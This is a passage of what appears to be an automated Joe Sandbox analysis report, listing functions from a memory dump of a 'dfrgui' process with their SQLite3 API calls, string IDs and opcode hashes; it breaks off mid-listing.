                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                                                                              • String ID: d
                                                                                              • API String ID: 4035452181-2564639436
                                                                                              • Opcode ID: 14b78a4c3c8340798257a3ff360959bee1709db71d2de19b0e2a7d32455eda3a
                                                                                              • Instruction ID: e70a6df271e69081c24506ddf681fdcd2edda6736b255e2e7bc53f2d41ec434e
                                                                                              • Opcode Fuzzy Hash: 14b78a4c3c8340798257a3ff360959bee1709db71d2de19b0e2a7d32455eda3a
                                                                                              • Instruction Fuzzy Hash: BEA118709093668BEB208F64C980799FBF1BF99304F24C99ED588AB241C775D985CF92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D34F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3D373
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D37F
                                                                                              • sqlite3_db_config.SQLITE3 ref: 61E3D3B8
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D3CF
                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E3D3F5
                                                                                                • Part of subcall function 61E1BAAD: sqlite3_free.SQLITE3 ref: 61E1BB4E
                                                                                                • Part of subcall function 61E1BAAD: sqlite3_free.SQLITE3 ref: 61E1BB5B
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D42B
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D445
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D474
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D48A
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D492
                                                                                              • sqlite3_db_config.SQLITE3 ref: 61E3D4BF
                                                                                              • sqlite3_result_blob.SQLITE3 ref: 61E3D4EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_result_error$sqlite3_db_configsqlite3_value_bytes$sqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                              • String ID: out of memory
                                                                                              • API String ID: 483519893-2599737071
                                                                                              • Opcode ID: 81e5bd5b382bcbed8d9db15a6d9fe3f1210165fe8e1c952d57f3c2c08254f641
                                                                                              • Instruction ID: de4bda10a9b9cb4a08021e80a6f4da87d5f0a0c722308755ae6057c49d8a5f80
                                                                                              • Opcode Fuzzy Hash: 81e5bd5b382bcbed8d9db15a6d9fe3f1210165fe8e1c952d57f3c2c08254f641
                                                                                              • Instruction Fuzzy Hash: 0251A3B49087559BCB10EF69C48469EBBF1BF88328F61CA1DE4A89B394D738D441CF52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E21437 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2146B
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21488
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E214AD
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E214EB
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2150E
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21525
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21542
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21564
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2157D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                              • String ID: (,)?$<expr>$rowid
                                                                                              • API String ID: 851024535-569625528
                                                                                              • Opcode ID: 43f41704c9cc32562f63c9c4f58412ff88c191ec67dc05be44d08dd92cc9e2f0
                                                                                              • Instruction ID: 3c16f107c21071c597ebe3d2fa5bb7d531971245fbde1235f1980425fa00eb65
                                                                                              • Opcode Fuzzy Hash: 43f41704c9cc32562f63c9c4f58412ff88c191ec67dc05be44d08dd92cc9e2f0
                                                                                              • Instruction Fuzzy Hash: 44413CB09047459BD7009F9AC9D169EBBF1BB85318F21C92DE4994B380C7B7DA81CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3CA14 Relevance: 18.4, APIs: 12, Instructions: 379COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                              • String ID:
                                                                                              • API String ID: 3802728871-0
                                                                                              • Opcode ID: 8308cf12dab309fa4928f7362e212e67aece02d64ef639b13ad07984a3c90b31
                                                                                              • Instruction ID: 0a8897d25ca39b30f5eab6b8760c588658bb3042ae8efb2c09a1f1b1b6dc5f2b
                                                                                              • Opcode Fuzzy Hash: 8308cf12dab309fa4928f7362e212e67aece02d64ef639b13ad07984a3c90b31
                                                                                              • Instruction Fuzzy Hash: B7127274A04729CFDB60DF69C984B8DBBF1BF88314F5085AAE859A7240E734DA85CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E63F0E Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E25429: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2546D
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E63F4E
                                                                                              • sqlite3_prepare_v2.SQLITE3 ref: 61E63F89
                                                                                              • sqlite3_step.SQLITE3 ref: 61E63FC0
                                                                                              • sqlite3_errmsg.SQLITE3 ref: 61E64189
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E641C8
                                                                                                • Part of subcall function 61E22C1A: sqlite3_log.SQLITE3 ref: 61E22C43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
                                                                                              • String ID: d$d
                                                                                              • API String ID: 2909166478-195624457
                                                                                              • Opcode ID: cc17d2924f1e441dc9d3603c8f71d740d306c38df475a4cee131425d329f77f6
                                                                                              • Instruction ID: c0f6dcb61892d96698d341ae6f3e7ed5e30a82f2dc40e63fcd0f797b84f716a4
                                                                                              • Opcode Fuzzy Hash: cc17d2924f1e441dc9d3603c8f71d740d306c38df475a4cee131425d329f77f6
                                                                                              • Instruction Fuzzy Hash: B4812C70E4425ACBDB01DFA9C59079EBBF5AF99308F60C42AE864E7340D778D841CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3694D Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp
                                                                                              • String ID: -$-$0$]$false$null$true$}
                                                                                              • API String ID: 1114863663-1443276563
                                                                                              • Opcode ID: cb518f88aff71661cb3374f2070d3ea01359b4f49c6546bf0cf142a1a5f487fe
                                                                                              • Instruction ID: 5ef84c330546f7dc50ad4400d779232d3ba82f1c422dff875aa92fb692e477b0
                                                                                              • Opcode Fuzzy Hash: cb518f88aff71661cb3374f2070d3ea01359b4f49c6546bf0cf142a1a5f487fe
                                                                                              • Instruction Fuzzy Hash: C0D1B270A082E64EDB16DFB8C4447E9BBF1AF8E318F68C55AC09187295D339D686CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3442D Relevance: 16.7, APIs: 11, Instructions: 199COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                              • String ID:
                                                                                              • API String ID: 3428878466-0
                                                                                              • Opcode ID: e8de7d89814dd69f653980643e134f9245317c8499bd3f162f4efebaf6688bdc
                                                                                              • Instruction ID: cc9cca9db0b93761c8f0f6c5264aab5c6b907c5c4ffce3031783b93ee4c9e31d
                                                                                              • Opcode Fuzzy Hash: e8de7d89814dd69f653980643e134f9245317c8499bd3f162f4efebaf6688bdc
                                                                                              • Instruction Fuzzy Hash: FF81CF75E04259DFCB00DFA9C980A9DBBF1BF89224F25816AE854AB354E735E842CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D78E Relevance: 16.7, APIs: 11, Instructions: 193COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E0A6F0: sqlite3_free.SQLITE3 ref: 61E0A6FF
                                                                                                • Part of subcall function 61E0A6F0: sqlite3_free.SQLITE3 ref: 61E0A70A
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3D7BB
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D7CE
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E3D7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3723316075-0
                                                                                              • Opcode ID: 643ac7df040c7117495d5938248d33ffdf5558ffb2c3c843cd0b5d361d86509f
                                                                                              • Instruction ID: cb07743064d60eae1468653b6cabbce3e4b221cd2c3a77bf51d8b7b272f23744
                                                                                              • Opcode Fuzzy Hash: 643ac7df040c7117495d5938248d33ffdf5558ffb2c3c843cd0b5d361d86509f
                                                                                              • Instruction Fuzzy Hash: C8816AB89042558FDB00DF69C48479ABBF1BFC8318F69C4A9D8889B356E774D881CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E0C8F7 Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 2313487548-0
                                                                                              • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                              • Instruction ID: c9ecf57121f205e21a64120e8e7d9f7e16678beb486510b2cd97e0988e13cc88
                                                                                              • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                              • Instruction Fuzzy Hash: 3E110AB4644749CBCB00BFB9D4D5418BBE4EF88249B56889EDCD48B316D734DCA0CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E37B16 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: false$null$true
                                                                                              • API String ID: 0-2913297407
                                                                                              • Opcode ID: 1b7217d25a7ccf5db1b935dde52d08845e5cac3b756602c3385ce55b2d5ba532
                                                                                              • Instruction ID: b515f5fb262dc7e69db8de8e4b8dd747f6da3dfa92c6f7e45f079b22d579be8f
                                                                                              • Opcode Fuzzy Hash: 1b7217d25a7ccf5db1b935dde52d08845e5cac3b756602c3385ce55b2d5ba532
                                                                                              • Instruction Fuzzy Hash: C3C1BD71E09265CBDB048FA8C4C079DBBB2ABCA318F29C16ED9449B346C735D846CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3C437 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 220COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C450
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                              • String ID: + $ NOT $ OR $"$(,)?
                                                                                              • API String ID: 2841607023-154350868
                                                                                              • Opcode ID: 27e9f43b54149d7c394525757cfdc6c9a5f9a57b38e4620f51e1f8706cbe1aae
                                                                                              • Instruction ID: c8fccd9bd3694b095a3720a09c7d51eb80419f676326d0fe8e24e2f2d46415ae
                                                                                              • Opcode Fuzzy Hash: 27e9f43b54149d7c394525757cfdc6c9a5f9a57b38e4620f51e1f8706cbe1aae
                                                                                              • Instruction Fuzzy Hash: 4C917B75A082759FDB01CFA8C48069DBBF0BF89704F25C96ED858AB341D374E841CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E01040 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep_amsg_exit
                                                                                              • String ID: 08aMingw-w64 runtime failure:$ti
                                                                                              • API String ID: 1015461914-2860349212
                                                                                              • Opcode ID: 52eab1edccf3adb4b628cb2c6d7ef23c0ba83e74d032204e76fbfc2283c5ace6
                                                                                              • Instruction ID: 5673fdc63cd166ac4d0bd20e0611f73cafa879edd8eeb223e9da6bff0d02e2ac
                                                                                              • Opcode Fuzzy Hash: 52eab1edccf3adb4b628cb2c6d7ef23c0ba83e74d032204e76fbfc2283c5ace6
                                                                                              • Instruction Fuzzy Hash: 1F418FB1614A818BEB00EFE9C58431ABBF1EB8674DF25C93DD4948F344E775D8908B82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E77B67 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E77BDE
                                                                                              • sqlite3_exec.SQLITE3 ref: 61E77C11
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77C2B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C3F
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E77C52
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C5F
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C78
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77C8D
                                                                                                • Part of subcall function 61E0A2DD: sqlite3_free.SQLITE3 ref: 61E0A30B
                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E77CB1
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77CC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
